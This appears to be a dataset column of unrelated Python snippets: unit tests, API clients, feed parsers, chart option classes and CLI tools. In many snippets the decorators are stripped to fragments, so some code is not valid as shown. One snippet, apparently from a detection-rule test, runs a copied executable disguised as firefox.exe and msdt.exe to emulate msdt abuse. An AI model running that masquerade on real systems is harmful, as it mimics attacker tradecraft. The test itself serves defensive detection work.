code stringlengths 281 23.7M |
|---|
class TestOrderAsStack(TestCase):
mode = 'static'
def setUp(self):
self.pool = IntPool(max_size=3, order_as_stack=True)
def test_ordering(self):
(one, two) = (self.pool.get(), self.pool.get())
self.pool.put(one)
self.pool.put(two)
self.assertEqual(self.pool.get(), two)
self.assertEqual(self.pool.get(), one) |
class MT41K64M16(DDR3Module):
nbanks = 8
nrows = 8192
ncols = 1024
technology_timings = _TechnologyTimings(tREFI=(.0 / 8192), tWTR=(4, 7.5), tCCD=(4, None), tRRD=(4, 10), tZQCS=(64, 80))
speedgrade_timings = {'800': _SpeedgradeTimings(tRP=13.1, tRCD=13.1, tWR=13.1, tRFC=(64, None), tFAW=(None, 50), tRAS=37.5), '1066': _SpeedgradeTimings(tRP=13.1, tRCD=13.1, tWR=13.1, tRFC=(86, None), tFAW=(None, 50), tRAS=37.5), '1333': _SpeedgradeTimings(tRP=13.5, tRCD=13.5, tWR=13.5, tRFC=(107, None), tFAW=(None, 45), tRAS=36), '1600': _SpeedgradeTimings(tRP=13.75, tRCD=13.75, tWR=13.75, tRFC=(128, None), tFAW=(None, 40), tRAS=35)}
speedgrade_timings['default'] = speedgrade_timings['1600'] |
.integration_saas
.integration_mailchimp
class TestSaasConnectorIntegration():
def test_saas_connector(self, db: Session, mailchimp_connection_config, mailchimp_dataset_config):
connector = get_connector(mailchimp_connection_config)
assert (connector.__class__ == SaaSConnector)
assert (connector.test_connection() == ConnectionTestStatus.succeeded)
mailchimp_connection_config.secrets = {'domain': 'bad_host'}
mailchimp_connection_config.save(db)
connector = get_connector(mailchimp_connection_config)
with pytest.raises(ConnectionException):
connector.test_connection() |
def extractWordofCraft(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol or frag)) or ('preview' in item['title'].lower())):
return None
if ('Toaru Ossan no VRMMO katsudouki' in item['tags']):
return buildReleaseMessageWithType(item, 'Toaru Ossan no VRMMO katsudouki', vol, chp, frag=frag, postfix=postfix)
return False |
class OptionSeriesVariwideSonificationDefaultinstrumentoptionsMappingLowpass(Options):
def frequency(self) -> 'OptionSeriesVariwideSonificationDefaultinstrumentoptionsMappingLowpassFrequency':
return self._config_sub_data('frequency', OptionSeriesVariwideSonificationDefaultinstrumentoptionsMappingLowpassFrequency)
def resonance(self) -> 'OptionSeriesVariwideSonificationDefaultinstrumentoptionsMappingLowpassResonance':
return self._config_sub_data('resonance', OptionSeriesVariwideSonificationDefaultinstrumentoptionsMappingLowpassResonance) |
class DistributionRestClient(Distribution):
API_URL = '/cosmos/distribution/v1beta1'
def __init__(self, rest_api: RestClient) -> None:
self._rest_api = rest_api
def CommunityPool(self) -> QueryCommunityPoolResponse:
json_response = self._rest_api.get(f'{self.API_URL}/community_pool')
return Parse(json_response, QueryCommunityPoolResponse())
def DelegationTotalRewards(self, request: QueryDelegationTotalRewardsRequest) -> QueryDelegationTotalRewardsResponse:
json_response = self._rest_api.get(f'{self.API_URL}/delegators/{request.delegator_address}/rewards')
return Parse(json_response, QueryDelegationTotalRewardsResponse())
def DelegationRewards(self, request: QueryDelegationRewardsRequest) -> QueryDelegationRewardsResponse:
json_response = self._rest_api.get(f'{self.API_URL}/delegators/{request.delegator_address}/rewards/{request.validator_address}')
return Parse(json_response, QueryDelegationRewardsResponse())
def DelegatorValidators(self, request: QueryDelegatorValidatorsRequest) -> QueryDelegatorValidatorsResponse:
json_response = self._rest_api.get(f'{self.API_URL}/delegators/{request.delegator_address}/validators')
return Parse(json_response, QueryDelegatorValidatorsResponse())
def DelegatorWithdrawAddress(self, request: QueryDelegatorWithdrawAddressRequest) -> QueryDelegatorWithdrawAddressResponse:
json_response = self._rest_api.get(f'{self.API_URL}/delegators/{request.delegator_address}/withdraw_address')
return Parse(json_response, QueryDelegatorWithdrawAddressResponse())
def Params(self) -> QueryParamsResponse:
json_response = self._rest_api.get(f'{self.API_URL}/params')
return Parse(json_response, QueryParamsResponse())
def ValidatorCommission(self, request: QueryValidatorCommissionRequest) -> QueryValidatorCommissionResponse:
json_response = self._rest_api.get(f'{self.API_URL}/validators/{request.validator_address}/commission')
return Parse(json_response, QueryValidatorCommissionResponse())
def ValidatorOutstandingRewards(self, request: QueryValidatorOutstandingRewardsRequest) -> QueryValidatorOutstandingRewardsResponse:
json_response = self._rest_api.get(f'{self.API_URL}/validators/{request.validator_address}/outstanding_rewards')
return Parse(json_response, QueryValidatorOutstandingRewardsResponse())
def ValidatorSlashes(self, request: QueryValidatorSlashesRequest) -> QueryValidatorSlashesResponse:
json_response = self._rest_api.get(f'{self.API_URL}/validators/{request.validator_address}/slashes', request, ['validatorAddress'])
return Parse(json_response, QueryValidatorSlashesResponse()) |
def test_parse_schema():
schema = {'type': 'record', 'name': 'test_parse_schema', 'fields': [{'name': 'field', 'type': 'string'}]}
parsed_schema = parse_schema(schema)
assert ('__fastavro_parsed' in parsed_schema)
parsed_schema_again = parse_schema(parsed_schema)
assert (parsed_schema_again == parsed_schema) |
_os(*metadata.platforms)
def main():
firefox = 'C:\\Users\\Public\\firefox.exe'
msdt = 'C:\\Users\\Public\\msdt.exe'
common.copy_file(EXE_FILE, firefox)
common.copy_file(EXE_FILE, msdt)
common.execute([firefox, '/c', 'msdt.exe /c', 'echo', '/cab', 'C:\\Users\\Public\\'], timeout=10)
common.remove_files(firefox, msdt) |
def test_unwrapped_task():
completed_process = subprocess.run([sys.executable, str((test_module_dir / 'unwrapped_decorator.py'))], env={'SCRIPT_INPUT': '10', 'SYSTEMROOT': 'C:\\Windows', 'HOMEPATH': 'C:\\Windows'}, text=True, capture_output=True)
error = completed_process.stderr
error_str = ''
for line in error.strip().split('\n'):
if line.startswith('ValueError'):
error_str += line
assert error_str.startswith('ValueError: TaskFunction cannot be a nested/inner or local function.') |
class TxtRecord(Record):
def __init__(self, tioconfig):
super(TxtRecord, self).__init__()
self.tioconfig = tioconfig
self.comment_raw = None
def from_string(cls, in_str, rid, tioconfig):
Encoding.check_unicode(in_str)
obj = cls(tioconfig)
obj.parse(in_str, rid)
return obj
def from_fd(cls, file_des, rid, tioconfig):
obj = cls(tioconfig)
obj.parse(file_des.read(), rid)
return obj
def write_fd(self, file_des):
for element in self:
element.write_fd(file_des)
def maybe_remove_last_empty_line(split_lines):
sl_len = len(split_lines)
if (sl_len == 0):
return
if (not split_lines[(sl_len - 1)]):
del split_lines[(sl_len - 1)]
return
def check_line_length(self, split_lines, rid):
max_line_length = self.tioconfig.get_max_line_length()
lineno = 0
for line in split_lines:
lineno += 1
if (len(line) > max_line_length):
logger.error(LogFormatter.format(80, ('line too long: is [%d], max allowed [%d]' % (len(line), max_line_length)), rid, lineno))
self._set_not_usable()
def parse(self, record, rid):
Encoding.check_unicode(record)
split_lines = record.split('\n')
self.check_line_length(split_lines, rid)
self.maybe_remove_last_empty_line(split_lines)
self.comment_raw = TxtParser.extract_record_comment(split_lines)
for comment in self.comment_raw:
Encoding.check_unicode(comment)
self.set_comment(TxtParser.extract_comment(self.comment_raw))
Encoding.check_unicode(self.get_comment())
(success, parsed_record) = TxtParser.split_entries(split_lines, rid, self, (len(self.comment_raw) + 1))
if (not success):
self._set_not_usable()
return
for i in parsed_record:
self.append(TxtRecordEntry(i))
return
def to_string(self):
rstring = TxtParser.add_newlines(self.comment_raw)
for line in self:
if isinstance(line, TxtRecordEntry):
rstring += line.to_string()
else:
rstring += TxtRecordEntry.format_entry(line)
return rstring |
def main():
args = docopt(__doc__)
project_path = project.check_for_project('.')
if (project_path is None):
raise ProjectNotFound
build_path = project_path.joinpath(_load_project_structure_config(project_path)['build'])
contract_artifact_path = build_path.joinpath('contracts')
interface_artifact_path = build_path.joinpath('interfaces')
if args['--all']:
shutil.rmtree(contract_artifact_path, ignore_errors=True)
shutil.rmtree(interface_artifact_path, ignore_errors=True)
elif args['<contract>']:
for name in args['<contract>']:
path = contract_artifact_path.joinpath(f'{name}.json')
if path.exists():
path.unlink()
proj = project.load()
if args['--size']:
print(' Deployment Bytecode Sizes ')
codesize = []
for contract in proj:
bytecode = contract._build['deployedBytecode']
if bytecode:
codesize.append((contract._name, (len(bytecode) // 2)))
indent = max((len(i[0]) for i in codesize))
for (name, size) in sorted(codesize, key=(lambda k: k[1]), reverse=True):
pct = (size / 24577)
pct_color = color(next((i[1] for i in CODESIZE_COLORS if (pct >= i[0])), ''))
print(f' {name:<{indent}} - {size:>6,}B ({pct_color}{pct:.2%}{color})')
print()
print(f'Project has been compiled. Build artifacts saved at {contract_artifact_path}') |
def extractShuranomichiWordpressCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
if (item['tags'] == ['Uncategorized']):
titlemap = [('The Consequence of Being Summoned Simultaneously From Another World Chapter ', 'The Consequence of Being Summoned Simultaneously From Another World', 'translated'), ('Tensei Shoujo no Rirekisho', 'Tensei Shoujo no Rirekisho', 'translated'), ('Master of Dungeon', 'Master of Dungeon', 'oel')]
for (titlecomponent, name, tl_type) in titlemap:
if (titlecomponent.lower() in item['title'].lower()):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
class WOFF2LocaTableTest(unittest.TestCase):
def setUp(self):
self.font = font = ttLib.TTFont(recalcBBoxes=False, recalcTimestamp=False)
font['head'] = ttLib.newTable('head')
font['loca'] = WOFF2LocaTable()
font['glyf'] = WOFF2GlyfTable()
def test_compile_short_loca(self):
locaTable = self.font['loca']
locaTable.set(list(range(0, 131072, 2)))
self.font['glyf'].indexFormat = 0
locaData = locaTable.compile(self.font)
self.assertEqual(len(locaData), 131072)
def test_compile_short_loca_overflow(self):
locaTable = self.font['loca']
locaTable.set(list(range((131072 + 1))))
self.font['glyf'].indexFormat = 0
with self.assertRaisesRegex(ttLib.TTLibError, 'indexFormat is 0 but local offsets > 0x20000'):
locaTable.compile(self.font)
def test_compile_short_loca_not_multiples_of_2(self):
locaTable = self.font['loca']
locaTable.set([1, 3, 5, 7])
self.font['glyf'].indexFormat = 0
with self.assertRaisesRegex(ttLib.TTLibError, 'offsets not multiples of 2'):
locaTable.compile(self.font)
def test_compile_long_loca(self):
locaTable = self.font['loca']
locaTable.set(list(range(131073)))
self.font['glyf'].indexFormat = 1
locaData = locaTable.compile(self.font)
self.assertEqual(len(locaData), (131073 * 4))
def test_compile_set_indexToLocFormat_0(self):
locaTable = self.font['loca']
locaTable.set(list(range(0, 131072, 2)))
locaTable.compile(self.font)
newIndexFormat = self.font['head'].indexToLocFormat
self.assertEqual(0, newIndexFormat)
def test_compile_set_indexToLocFormat_1(self):
locaTable = self.font['loca']
locaTable.set(list(range(10)))
locaTable.compile(self.font)
newIndexFormat = self.font['head'].indexToLocFormat
self.assertEqual(1, newIndexFormat)
locaTable.set(list(range(0, (131072 + 1), 2)))
locaTable.compile(self.font)
newIndexFormat = self.font['head'].indexToLocFormat
self.assertEqual(1, newIndexFormat) |
def sync_domains(site, domains, bench_path='.'):
changed = False
existing_domains = get_domains_dict(get_domains(site, bench_path))
new_domains = get_domains_dict(domains)
if (set(existing_domains.keys()) != set(new_domains.keys())):
changed = True
else:
for d in list(existing_domains.values()):
if (d != new_domains.get(d['domain'])):
changed = True
break
if changed:
update_site_config(site, {'domains': domains}, bench_path='.')
return changed |
def extractGolemcreationkitCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
class OptionSeriesOrganizationDragdrop(Options):
def draggableX(self):
return self._config_get(None)
def draggableX(self, flag: bool):
self._config(flag, js_type=False)
def draggableY(self):
return self._config_get(None)
def draggableY(self, flag: bool):
self._config(flag, js_type=False)
def dragHandle(self) -> 'OptionSeriesOrganizationDragdropDraghandle':
return self._config_sub_data('dragHandle', OptionSeriesOrganizationDragdropDraghandle)
def dragMaxX(self):
return self._config_get(None)
def dragMaxX(self, num: float):
self._config(num, js_type=False)
def dragMaxY(self):
return self._config_get(None)
def dragMaxY(self, num: float):
self._config(num, js_type=False)
def dragMinX(self):
return self._config_get(None)
def dragMinX(self, num: float):
self._config(num, js_type=False)
def dragMinY(self):
return self._config_get(None)
def dragMinY(self, num: float):
self._config(num, js_type=False)
def dragPrecisionX(self):
return self._config_get(0)
def dragPrecisionX(self, num: float):
self._config(num, js_type=False)
def dragPrecisionY(self):
return self._config_get(0)
def dragPrecisionY(self, num: float):
self._config(num, js_type=False)
def dragSensitivity(self):
return self._config_get(2)
def dragSensitivity(self, num: float):
self._config(num, js_type=False)
def groupBy(self):
return self._config_get(None)
def groupBy(self, text: str):
self._config(text, js_type=False)
def guideBox(self) -> 'OptionSeriesOrganizationDragdropGuidebox':
return self._config_sub_data('guideBox', OptionSeriesOrganizationDragdropGuidebox)
def liveRedraw(self):
return self._config_get(True)
def liveRedraw(self, flag: bool):
self._config(flag, js_type=False) |
class Runner():
def __init__(self, options: dict):
self.options = options
self.loop: asyncio.AbstractEventLoop = asyncio.get_event_loop()
def run_jobs(self, job_names, releases):
jobs = build_jobs_list(job_names, releases=releases, options=self.options)
self._run_jobs(jobs)
def _run_jobs(self, jobs: typing.List[Job]):
if (not jobs):
click.echo('No jobs!', err=True)
sys.exit(3)
progress_reporter = ProgressReporter(jobs)
progress_reporter.print_status()
processes = [self.loop.create_task(j.run()) for j in jobs]
return_when: str = asyncio.ALL_COMPLETED
if self.options['failfast']:
return_when = asyncio.FIRST_EXCEPTION
future = asyncio.wait(processes, return_when=return_when)
self.loop.add_signal_handler(signal.SIGINT, functools.partial(_cancel_jobs, jobs))
try:
(done, pending) = self.loop.run_until_complete(future)
results = self._process_results(done, pending)
finally:
self._stop_all_jobs()
if results['returncode']:
click.echo(results['error_output'], err=True)
sys.exit(results['returncode'])
def _process_results(self, done, pending):
returncode = 0
error_output = ''
if pending:
for task in pending:
task.cancel()
future = asyncio.wait(pending)
(cancelled, pending) = self.loop.run_until_complete(future)
done = (done | cancelled)
returncode = (- signal.SIGINT)
for task in done:
try:
result = task.result()
except RuntimeError as e:
result = e.result
if ((not result.cancelled) and result.returncode):
if result.output:
error_output = f'''{error_output}
{result.output}'''
if (not returncode):
returncode = result.returncode
return {'error_output': error_output, 'returncode': returncode}
def _stop_all_jobs(self):
args = [self.options['container_runtime'], 'ps', f'--filter=label={CONTAINER_LABEL}', '-q']
processes = subprocess.check_output(args).decode()
stop_jobs = [self.loop.create_task(StopJob(process).run()) for process in processes.split('\n') if process]
if stop_jobs:
stop_future = asyncio.wait(stop_jobs)
self.loop.run_until_complete(stop_future) |
class NotificationSettings(FidesSettings):
notification_service_type: Optional[str] = Field(default=None, description='Sets the notification service type used to send notifications. Accepts mailchimp_transactional, mailgun, twilio_sms, or twilio_email.')
send_request_completion_notification: bool = Field(default=False, description='When set to True, enables subject notifications upon privacy request completion.')
send_request_receipt_notification: bool = Field(default=False, description='When set to True, enables subject notifications upon privacy request receipt.')
send_request_review_notification: bool = Field(default=False, description='When set to True, enables subject notifications upon privacy request review.')
('notification_service_type', pre=True)
def validate_notification_service_type(cls, value: Optional[str]) -> Optional[str]:
if value:
valid_values = ['mailgun', 'twilio_text', 'twilio_email', 'mailchimp_transactional']
value = value.lower()
if (value not in valid_values):
raise ValueError(f"Invalid NOTIFICATION_SERVICE_TYPE provided '{value}', must be one of: {', '.join([level for level in valid_values])}")
return value
class Config():
env_prefix = ENV_PREFIX |
def parse_aces(input_buffer, count):
out = []
while (len(out) < count):
ace = dict()
fields = ('Raw Type', 'Raw Flags', 'Size', 'Raw Access Required')
for (k, v) in zip(fields, unpack('<BBHI', input_buffer[:8])):
ace[k] = v
ace['Type'] = parse_sddl_dacl_ace_type(ace['Raw Type'])
ace['Access Required'] = parse_ace_access(ace['Raw Access Required'])
offset = 8
if ace['Type'].endswith('Object'):
fields = ('Raw Object Flags',)
for (k, v) in zip(fields, unpack('<I', input_buffer[8:12])):
ace[k] = v
ace['Object Flags'] = parse_ace_object_flags(ace['Raw Object Flags'])
offset = 12
if ace['Object Flags']['Object Type Present']:
ace['GUID'] = format_uuid_le(input_buffer[offset:(offset + 16)])
offset += 16
if ace['Object Flags']['Inherited Object Type Present']:
ace['Inherited GUID'] = format_uuid_le(input_buffer[offset:(offset + 16)])
offset += 16
ace['SID'] = format_sid(input_buffer[offset:ace['Size']])
ace['SID'] = format_sid(input_buffer[offset:ace['Size']])
input_buffer = input_buffer[ace['Size']:]
out.append(ace)
return out |
class BasicFormatter(object):
avg_label_width = 7.0
use_scientific = True
scientific_limits = ((- 3), 5)
def __init__(self, **kwds):
self.__dict__.update(kwds)
def oldformat(self, ticks, numlabels=None, char_width=None):
labels = []
if (len(ticks) == 0):
return []
d = abs((ticks[(- 1)] - ticks[0]))
for x in ticks:
if ((abs(x) < 10000.0) and (x == int(x))):
labels.append(('%d' % x))
continue
if (d < 0.01):
fmt = '%1.3e'
elif (d < 0.1):
fmt = '%1.3f'
elif (d > 100000.0):
fmt = '%1.1e'
elif (d > 10):
fmt = '%1.1f'
elif (d > 1):
fmt = '%1.2f'
else:
fmt = '%1.3f'
s = (fmt % x)
tup = s.split('e')
if (len(tup) == 2):
mantissa = tup[0].rstrip('0').rstrip('.')
sign = tup[1][0].replace('+', '')
exponent = tup[1][1:].lstrip('0')
if (sign or exponent):
s = ('%se%s%s' % (mantissa, sign, exponent))
else:
s = mantissa
else:
s = s.rstrip('0').rstrip('.')
labels.append(s)
return labels
def format(self, ticks, numlabels=None, char_width=None, fill_ratio=0.3):
if (len(ticks) == 0):
return []
ticks = asarray(ticks)
if self.use_scientific:
scientific = (((ticks % (10 ** self.scientific_limits[1])) == 0) | (abs(ticks) <= (10 ** self.scientific_limits[0]))).all()
else:
scientific = False
if scientific:
if (char_width is not None):
chars_per_label = int(((char_width * fill_ratio) / len(ticks)))
maxtick = amax(abs(ticks))
if (maxtick > 0):
exp_oom = str(int(floor(log10(maxtick))))
else:
exp_oom = '0'
emax = len(exp_oom)
if (chars_per_label < emax):
mmax = 3
else:
mmax = ((chars_per_label - emax) - 1)
else:
mmax = (- 1)
labels = [self._nice_sci(x, mmax) for x in ticks]
elif (not (ticks % 1).any()):
labels = list(map(str, ticks.astype(int)))
else:
labels = list(map(str, ticks))
return labels
def _nice_sci(self, val, mdigits, force_sign=False):
if (val != 0):
e = int(floor(log10(abs(val))))
else:
e = 0
m = (val / float((10 ** e)))
m_str = str(m)
if ((mdigits > 0) and ('.' in m_str)):
max_len = max(m_str.index('.'), mdigits)
m_str = m_str[:max_len]
if (m_str[(- 1)] == '.'):
m_str = m_str[:(- 1)]
elif (m_str[(- 1)] == '.'):
m_str = m_str[:(- 1)]
if (force_sign and (not m_str.startswith('-'))):
m_str = ('+' + m_str)
if (e != 0):
e_str = str(e)
if (e_str.startswith('+') and (not force_sign)):
e_str = e_str[1:]
m_str += ('e' + e_str)
return m_str
def estimate_width(self, start, end, numlabels=None, char_width=None, fill_ratio=0.3, ticker=None):
if ((numlabels == 0) or (char_width == 0)):
return (0, 0)
labelsizes = map(len, self.format([start, end]))
avg_size = (sum(labelsizes) / 2.0)
if ticker:
if numlabels:
initial_estimate = numlabels
elif char_width:
initial_estimate = round(((fill_ratio * char_width) / avg_size))
est_ticks = ticker.num_ticks(start, end, initial_estimate)
elif numlabels:
est_ticks = numlabels
elif char_width:
est_ticks = round(((fill_ratio * char_width) / avg_size))
return (est_ticks, (est_ticks * avg_size)) |
_group.command('delete-job')
('job-name')
('job-type')
_context
def delete_job(ctx: click.Context, job_name, job_type, verbose=True):
es_client: Elasticsearch = ctx.obj['es']
ml_client = MlClient(es_client)
try:
if (job_type == 'anomaly_detection'):
ml_client.delete_job(job_name)
elif (job_type == 'data_frame_analytic'):
ml_client.delete_data_frame_analytics(job_name)
elif (job_type == 'datafeed'):
ml_client.delete_datafeed(job_name)
else:
client_error(f'Unknown ML job type: {job_type}')
except (elasticsearch.NotFoundError, elasticsearch.ConflictError) as e:
client_error(str(e), e, ctx=ctx)
if verbose:
click.echo(f'Deleted {job_type} job: {job_name}') |
class TestStartStopNotificationService():
def test_shutdown_service_with_schedule_disable(self, fledge_url, disable_schedule, wait_time):
disable_schedule(fledge_url, SERVICE_NAME)
pause_for_x_seconds(x=wait_time)
_verify_service(fledge_url, status='shutdown')
pause_for_x_seconds(x=wait_time)
_verify_audit_log_entry(fledge_url, '/fledge/audit?source=NTFSD', name=SERVICE_NAME, count=1)
def test_restart_notification_service(self, fledge_url, enable_schedule, wait_time):
enable_schedule(fledge_url, SERVICE_NAME)
pause_for_x_seconds(x=wait_time)
_verify_service(fledge_url, status='running')
_verify_audit_log_entry(fledge_url, '/fledge/audit?source=NTFST', name=SERVICE_NAME, count=2) |
class MFBias(nn.Module):
def __init__(self, emb_size, emb_dim, c_vector=1e-06, c_bias=1e-06):
super().__init__()
self.emb_size = emb_size
self.emb_dim = emb_dim
self.c_vector = c_vector
self.c_bias = c_bias
self.product_embedding = nn.Embedding(emb_size, emb_dim)
self.sig = nn.Sigmoid()
self.product_bias = nn.Embedding(emb_size, 1)
self.bias = nn.Parameter(torch.ones(1))
self.bce = nn.BCELoss()
logger.info('Model initialized: {}'.format(self))
def forward(self, product1, product2):
emb_product1 = self.product_embedding(product1)
emb_product2 = self.product_embedding(product2)
interaction = torch.sum((emb_product1 * emb_product2), dim=1, dtype=torch.float)
bias_product1 = self.product_bias(product1).squeeze()
bias_product2 = self.product_bias(product2).squeeze()
biases = ((self.bias + bias_product1) + bias_product2)
prediction = self.sig((interaction + biases))
return prediction
def loss(self, pred, label):
mf_loss = self.bce(pred, label)
product_prior = (regularize_l2(self.product_embedding.weight) * self.c_vector)
product_bias_prior = (regularize_l2(self.product_bias.weight) * self.c_bias)
loss_total = ((mf_loss + product_prior) + product_bias_prior)
return loss_total |
def test_find_repr_is_working_properly(create_ref_test_data, create_maya_env):
data = create_ref_test_data
maya_env = create_maya_env
maya_env.save_as(data['asset2_model_take1_v001'])
ref = maya_env.reference(data['repr_version1'])
assert (ref.path == data['repr_version1'].absolute_full_path)
result = ref.find_repr('GPU')
assert (result.absolute_full_path == data['repr_version9'].absolute_full_path) |
class CommonRangeTests(object):
def test_accepts_int(self):
self.model.percentage = 35
self.assertIs(type(self.model.percentage), int)
self.assertEqual(self.model.percentage, 35)
with self.assertRaises(TraitError):
self.model.percentage = (- 1)
with self.assertRaises(TraitError):
self.model.percentage = 101
def test_accepts_bool(self):
self.model.percentage = False
self.assertIs(type(self.model.percentage), int)
self.assertEqual(self.model.percentage, 0)
self.model.percentage = True
self.assertIs(type(self.model.percentage), int)
self.assertEqual(self.model.percentage, 1)
def test_rejects_bad_types(self):
non_integers = ['not a number', '', b'not a number', '3.5', '3', (3 + 4j), 0j, [1.2], (1.2,), 0.0, (- 27.8), 35.0, None]
for non_integer in non_integers:
self.model.percentage = 73
with self.assertRaises(TraitError):
self.model.percentage = non_integer
self.assertEqual(self.model.percentage, 73)
_numpy
def test_accepts_numpy_types(self):
numpy_values = [numpy.uint8(25), numpy.uint16(25), numpy.uint32(25), numpy.uint64(25), numpy.int8(25), numpy.int16(25), numpy.int32(25), numpy.int64(25)]
for numpy_value in numpy_values:
self.model.percentage = numpy_value
self.assertIs(type(self.model.percentage), int)
self.assertEqual(self.model.percentage, 25)
_numpy
def test_rejects_numpy_types(self):
numpy_values = [numpy.float16(25), numpy.float32(25), numpy.float64(25)]
for numpy_value in numpy_values:
self.model.percentage = 88
with self.assertRaises(TraitError):
self.model.percentage = numpy_value
self.assertEqual(self.model.percentage, 88)
def test_accepts_int_subclass(self):
self.model.percentage = InheritsFromInt(44)
self.assertIs(type(self.model.percentage), int)
self.assertEqual(self.model.percentage, 44)
with self.assertRaises(TraitError):
self.model.percentage = InheritsFromInt((- 1))
with self.assertRaises(TraitError):
self.model.percentage = InheritsFromInt(101)
def test_accepts_int_like(self):
self.model.percentage = IntLike(35)
self.assertIs(type(self.model.percentage), int)
self.assertEqual(self.model.percentage, 35)
with self.assertRaises(TraitError):
self.model.percentage = IntLike((- 1))
with self.assertRaises(TraitError):
self.model.percentage = IntLike(101)
def test_bad_int_like(self):
with self.assertRaises(ZeroDivisionError):
self.model.percentage = BadIntLike()
def test_endpoints(self):
self.model.open = self.model.closed = 50
self.model.open_closed = self.model.closed_open = 50
self.assertEqual(self.model.open, 50)
self.assertEqual(self.model.closed, 50)
self.assertEqual(self.model.open_closed, 50)
self.assertEqual(self.model.closed_open, 50)
self.model.closed = self.model.closed_open = 0
self.assertEqual(self.model.closed, 0)
self.assertEqual(self.model.closed_open, 0)
with self.assertRaises(TraitError):
self.model.open = 0
with self.assertRaises(TraitError):
self.model.open_closed = 0
self.model.closed = self.model.open_closed = 100
self.assertEqual(self.model.closed, 100)
self.assertEqual(self.model.open_closed, 100)
with self.assertRaises(TraitError):
self.model.open = 100
with self.assertRaises(TraitError):
self.model.closed_open = 100
def test_half_infinite(self):
ice_temperatures = [(- 273), (- 100), (- 1)]
water_temperatures = [1, 50, 99]
steam_temperatures = [101, 1000, (10 ** 100), (10 ** 1000)]
for temperature in steam_temperatures:
self.model.steam_temperature = temperature
self.assertEqual(self.model.steam_temperature, temperature)
for temperature in (ice_temperatures + water_temperatures):
self.model.steam_temperature = 1729
with self.assertRaises(TraitError):
self.model.steam_temperature = temperature
self.assertEqual(self.model.steam_temperature, 1729)
for temperature in ice_temperatures:
self.model.ice_temperature = temperature
self.assertEqual(self.model.ice_temperature, temperature)
for temperature in (water_temperatures + steam_temperatures):
self.model.ice_temperature = (- 1729)
with self.assertRaises(TraitError):
self.model.ice_temperature = temperature
self.assertEqual(self.model.ice_temperature, (- 1729)) |
_app.route('/history')
_app.route('/history/<game_id>')
_app.route('/checkversion/<version>/history')
_app.route('/checkversion/<version>/history/<game_id>')
def history_page(game_id='', version=None):
show_old_version_notice = ((version is not None) and utils.is_old_version(version))
matches = datamodel.get_known_games(game_id)
if (not matches):
logger.warning(f'Could not find a game matching {game_id}')
return render_template('404_page.html', game_not_found=True, game_name=game_id)
game_id = matches[0]
games_dict = datamodel.get_available_games_dict()
country = games_dict[game_id]['country_name']
event_filter = get_event_filter()
with datamodel.get_db_session(game_id) as session:
dict_builder = EventTemplateDictBuilder(session, game_id, event_filter)
(events, title, details, links) = dict_builder.get_event_and_link_dicts()
wars = dict_builder.get_war_list()
return render_template('history_page.html', game_name=game_id, country=country, wars=wars, events=events, details=details, links=links, title=title, is_filtered_page=(not event_filter.is_empty_filter), show_old_version_notice=show_old_version_notice, version=utils.VERSION, update_version_id=version) |
class AnityaTestCase(unittest.TestCase):
def setUp(self):
self.config = config.config.copy()
self.config['TESTING'] = True
self.flask_app = app.create(self.config)
cwd = os.path.dirname(os.path.realpath(__file__))
my_vcr = vcr.VCR(cassette_library_dir=os.path.join(cwd, 'request-data/'), record_mode='once', decode_compressed_response=True)
self.vcr = my_vcr.use_cassette(self.id(), filter_headers=[('Authorization', 'bearer foobar')])
self.vcr.__enter__()
self.addCleanup(self.vcr.__exit__, None, None, None) |
class Settings(object):
PKG_NAME = 'fkie_node_manager'
try:
PACKAGE_DIR = roslib.packages.get_pkg_dir(PKG_NAME)
except Exception:
PACKAGE_DIR = ('%s/../..' % os.path.realpath(os.path.dirname(__file__)))
if ('dist-packages' in __file__):
PACKAGE_DIR = ('%s/../../share/fkie_node_manager' % PACKAGE_DIR)
print(('PACKAGE_DIR: %s' % PACKAGE_DIR))
CFG_PATH = os.path.expanduser('~/.config/ros.fkie/node_manager/')
HELP_FILE = os.path.join(PACKAGE_DIR, 'doc/index.rst')
CURRENT_DIALOG_PATH = os.path.expanduser('~')
LOG_PATH = screen.LOG_PATH
LOG_VIEWER = '/usr/bin/less -fKLnQrSU'
STARTER_SCRIPT = 'rosrun fkie_node_manager remote_nm.py'
LAUNCH_HISTORY_FILE = 'launch.history'
PARAM_HISTORY_FILE = 'param.history'
CFG_FILE = 'settings.ini'
CFG_GUI_FILE = 'settings.ini'
TIMEOUT_CONTROL = 5
TIMEOUT_UPDATES = 20
SEARCH_IN_EXT = ['.launch', '.yaml', '.conf', '.cfg', '.iface', '.nmprofile', '.sync', '.test', '.xml', '.xacro']
LAUNCH_VIEW_EXT = ['.launch', '.yaml', '.conf', '.cfg', '.iface', '.nmprofile', '.sync', '.test', '.xacro']
DEAFULT_HOST_COLORS = [QColor(255, 255, 235).rgb()]
def __init__(self):
self._data = {}
self.reload()
def reload(self):
self._terminal_emulator = None
self._terminal_command_arg = 'e'
self._noclose_str = ''
self._terminal_title = '-T'
self._masteruri = masteruri_from_ros()
self.CFG_PATH = os.path.expanduser('~/.config/ros.fkie/node_manager/')
if (not os.path.isdir(self.CFG_PATH)):
os.makedirs(self.CFG_PATH)
self.cfg_path = self.CFG_PATH
try:
import shutil
old_cfg_path = os.path.join(get_ros_home(), 'node_manager')
if os.path.exists(old_cfg_path):
print(('move configuration to new destination: %s' % self.CFG_PATH))
for filename in os.listdir(old_cfg_path):
shutil.move(os.path.join(old_cfg_path, filename), os.path.join(self.CFG_PATH, filename))
shutil.rmtree(old_cfg_path)
except Exception:
pass
print(('Configuration path: %s' % self.CFG_PATH))
settings = self.qsettings(self.CFG_FILE)
self._data = self._load_settings(settings)
